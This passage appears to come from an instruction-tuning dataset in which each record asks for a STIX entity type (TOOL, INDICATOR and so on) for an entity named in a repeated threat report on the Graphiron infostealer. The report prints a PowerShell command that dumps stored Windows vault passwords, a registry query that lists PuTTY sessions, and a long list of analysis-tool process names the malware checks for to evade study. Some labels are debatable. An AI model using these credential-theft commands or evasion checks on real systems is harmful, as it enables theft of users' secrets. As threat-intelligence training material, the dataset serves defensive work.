"input": "### Entity:\nhttps://checkip.amazonaws.com\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWireshar\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidau\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nThunderbird\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nImportREC\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nscylla\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nDumpIt\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
